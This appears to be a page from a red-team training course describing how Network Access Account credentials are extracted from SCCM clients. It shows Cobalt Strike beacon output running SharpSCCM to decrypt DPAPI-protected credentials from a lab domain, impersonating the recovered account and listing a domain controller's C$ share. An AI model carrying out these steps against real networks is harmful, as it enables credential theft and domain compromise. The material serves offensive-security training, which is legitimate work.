Network Access Account Credentials

In a Windows environment, the majority of computers will be domain-joined and will therefore authenticate to SCCM Software Distribution Points (SDPs) (basically just SMB shares) using their own machine account credentials. However, some computers may not be domain-joined. Network Access Account credentials (NAAs) are domain credentials intended to be used by these machines to access the SDPs over the network. They are passed to the machines as part of the SCCM machine policies, which are then encrypted using DPAPI and stored locally. If they are present, privileged users can retrieve these credential blobs via WMI or directly from disk and decrypt them to recover plaintext credentials.

Use local naa with -m wmi or -m disk.

beacon> getuid
[*] You are DEV\bfarmer (admin)

beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe local naa -m wmi --no-banner

[+] Connecting to \\127.0.0.1\root\ccm\policy\Machine\ActualConfig
[+] Retrieving network access account blobs via WMI
[+] Retrieving task sequence blobs via WMI
[+] Retrieving collection variable blobs via WMI

[...snip...]

[+] Decrypting network access account credentials

    NetworkAccessUsername: cyberbotic.io\sccm_svc
    NetworkAccessPassword: Cyberb0tic

These credentials should only have read access to the SDP, but are often times over privileged (sometimes even domain/enterprise admins).

beacon> make_token cyberbotic.io\sccm_svc Cyberb0tic
[+] Impersonated cyberbotic.io\sccm_svc (netonly)

beacon> ls \\dc-1.cyberbotic.io\c$
[*] Listing: \\dc-1.cyberbotic.io\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/15/2022 15:26:54   $Recycle.Bin
          dir     08/10/2022 04:55:17   $WinREAgent
          dir     08/10/2022 05:05:53   Boot
          dir     08/18/2021 23:34:55   Documents and Settings
          dir     08/19/2021 06:24:49   EFI
          dir     05/08/2021 08:20:24   PerfLogs
          dir     09/26/2023 09:07:25   Program Files
          dir     08/10/2022 04:06:16   Program Files (x86)
          dir     09/26/2023 09:13:26   ProgramData
          dir     08/15/2022 15:07:48   Recovery
          dir     08/24/2022 11:05:32   Shares
          dir     09/26/2023 14:28:24   System Volume Information
          dir     08/15/2022 15:09:04   Users
          dir     09/26/2023 09:10:03   Windows
 427kb    fil     08/10/2022 05:00:07   bootmgr
 1b       fil     05/08/2021 08:14:33   BOOTNXT
 12kb     fil     09/27/2023 09:28:28   DumpStack.log.tmp
 1kb      fil     09/25/2023 19:07:33   ExtADSch.log
 384mb    fil     09/27/2023 09:28:28   pagefile.sys

An alternate approach is to request a copy of the policy directly from SCCM using get naa. This also requires local admin on the local machine to obtain a copy of its SMS Signing and SMS Encryption certificates.

PreviousEnumerationNextLateral Movement

Last updated